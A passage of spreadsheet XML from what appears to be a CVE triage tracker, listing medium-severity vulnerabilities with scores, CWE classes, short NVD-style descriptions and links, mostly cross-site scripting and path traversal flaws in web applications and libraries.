        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71616</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr"/>
      <c r="Q823" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>An issue in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to cause a denial of service via the function gf_route_media_complete_object(). Fixed in 3c4e6c5b3e0c6fa9b16d55599701a08354538fab.</t>
        </is>
      </c>
      <c r="S823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71616</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87732</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr"/>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr"/>
      <c r="Q824" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto package before 2.2.0 for OCaml. The AES.GCM.authenticate_decrypt_into and Chacha20.authenticate_decrypt_into functions write the decrypted plaintext into a caller-provided buffer and only then compares the tag. On a forged tag, the functions returns false, but the destination buffer already holds the full plaintext.</t>
        </is>
      </c>
      <c r="S824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87732</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87733</t>
        </is>
      </c>
      <c r="D825" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr"/>
      <c r="Q825" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-ec function before 2.2.0 for OCaml. The ECDSA functions {P256,P384,P521}.Dsa.pub_of_octets accept 0x00, the encoding of the point at infinity, as a public key. With that public key, signatures can be forged without a private key.</t>
        </is>
      </c>
      <c r="S825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87733</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-30983</t>
        </is>
      </c>
      <c r="D826" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr"/>
      <c r="Q826" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R826" s="5" t="inlineStr">
        <is>
          <t>A cross-site scripting (XSS) vulnerability in Support chatbot in Nopaperforms Niaa-Chatbot through 2022-05-17 allows remote attackers to inject arbitrary web script or HTML via the Enter email parameter.</t>
        </is>
      </c>
      <c r="S826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-30983</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19797</t>
        </is>
      </c>
      <c r="D827" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E827" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F827" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr"/>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr"/>
      <c r="Q827" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R827" s="5" t="inlineStr">
        <is>
          <t>The User Access Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab_group_section' parameter in all versions up to, and including, 2.3.18 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="S827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19797</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21103</t>
        </is>
      </c>
      <c r="D828" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E828" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr"/>
      <c r="Q828" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="R828" s="5" t="inlineStr">
        <is>
          <t>Path traversal in GalaxyDiagnostics prior to SMR Sep-2026 Release 1 allows physical attackers to access files with system privilege.</t>
        </is>
      </c>
      <c r="S828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21103</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37710</t>
        </is>
      </c>
      <c r="D829" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E829" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F829" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr"/>
      <c r="Q829" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R829" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Omeka S v.4.2.0 allows a remote attacker to execute arbitrary code via the site navigation custom URL function</t>
        </is>
      </c>
      <c r="S829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37710</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50980</t>
        </is>
      </c>
      <c r="D830" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E830" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F830" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr"/>
      <c r="Q830" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R830" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS) vulnerability in the DNS lookup/management component of oPanel before v1.20.25 allows remote attackers to execute arbitrary JavaScript and perform session hijacking via a crafted DNS TXT record</t>
        </is>
      </c>
      <c r="S830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50980</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54687</t>
        </is>
      </c>
      <c r="D831" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E831" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F831" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr"/>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr"/>
      <c r="Q831" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R831" s="5" t="inlineStr">
        <is>
          <t>n8n-nodes-sqlite3 is a node for operating a local SQLite database from n8n. Prior to 1.0.0, nodes/SqliteNode/v1/SqliteV1.node.ts exposes the db_path database file path as a node parameter that permits data expressions from upstream workflow input. A workflow author who maps untrusted input to db_path can allow a remote attacker to select which SQLite file the n8n process opens, enabling traversal outside the intended database location and potentially reading, creating, or overwriting files accessible to the process. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="S831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54687</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55059</t>
        </is>
      </c>
      <c r="D832" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E832" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F832" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr"/>
      <c r="Q832" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R832" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions prior to 3.2.10, 3.3.12 and 3.4.13 contain a heap out-of-bounds write in Imf_4_0::SampleCountChannel::set(int r, unsigned int newNumSamples[]). The row-based sample-count setter computes the target Y coordinate with dataWindow.min.x instead of dataWindow.min.y. For a valid deep image data window where min.x != min.y, a valid row index can be translated into an invalid Y coordinate, causing writes before the allocated _numSamples buffer. The vulnerability is reachable through the public OpenEXRUtil DeepImage API and can lead to heap corruption and process crashes. This issue has been fixed in versions 3.2.10, 3.3.12 and 3.4.13.</t>
        </is>
      </c>
      <c r="S832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55059</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55530</t>
        </is>
      </c>
      <c r="D833" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E833" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F833" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr"/>
      <c r="L833" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr"/>
      <c r="Q833" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R833" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, ast_grep_rewrite lacks the @require_approval decorator used by sibling mutation tools. With dry_run=False, an agent-controlled call can pass --update-all and a broad path to rewrite matching files without the expected authorization gate. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55530</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75170</t>
        </is>
      </c>
      <c r="D834" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E834" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F834" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr"/>
      <c r="Q834" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R834" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting (XSS) vulnerability in the /loginController/doLogin endpoint of the HubCore platform (version 14.1.1) allows a remote unauthenticated attacker to inject arbitrary JavaScript into the application's response via the language POST parameter.</t>
        </is>
      </c>
      <c r="S834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75170</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75307</t>
        </is>
      </c>
      <c r="D835" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E835" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F835" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr"/>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr"/>
      <c r="Q835" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R835" s="5" t="inlineStr">
        <is>
          <t>zhitan-ems 1.0.0 is vulnerable to Cross Site Scripting (XSS) via SVG file upload through the /equipmentFile/upload endpoint.</t>
        </is>
      </c>
      <c r="S835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75307</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75308</t>
        </is>
      </c>
      <c r="D836" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E836" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F836" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr"/>
      <c r="Q836" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R836" s="5" t="inlineStr">
        <is>
          <t>yshopmall &lt;=3.3 is vulnerable to Cross Site Scripting (XSS). The file upload endpoint /api/upload of the system lacks file type validation. Attackers can upload files of any type, including HTML, JSP, and other executable files.</t>
        </is>
      </c>
      <c r="S836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75308</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7804</t>
        </is>
      </c>
      <c r="D837" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E837" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F837" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr"/>
      <c r="Q837" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R837" s="5" t="inlineStr">
        <is>
          <t>The Product Filter for WooCommerce by WBW plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpf_fid' parameter in all versions up to, and including, 3.4.2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the crafted request to target a page where a filter using the vulnerable recalculation output is present.</t>
        </is>
      </c>
      <c r="S837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7804</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78377</t>
        </is>
      </c>
      <c r="D838" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E838" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F838" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr"/>
      <c r="Q838" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R838" s="5" t="inlineStr">
        <is>
          <t>URL redirection to untrusted site ('open redirect') vulnerability in Yordam Informatics Technology Consulting, Training, and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows Phishing.
This issue affects Library Information and Document Automation Program: from v22.1 before v22.2.</t>
        </is>
      </c>
      <c r="S838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78377</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79419</t>
        </is>
      </c>
      <c r="D839" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E839" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F839" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr"/>
      <c r="Q839" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R839" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability exists in EMX Tecnologia Gestao X Business Suite 8.4 and earlier. The vulnerability is caused by insufficient validation and sanitization of the mensagem parameter in the /Configuracao/Imagens.aspx endpoint, allowing an authenticated attacker to inject arbitrary JavaScript code that is reflected and executed in the context of a victim's browser.</t>
        </is>
      </c>
      <c r="S839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79419</t>
        </is>
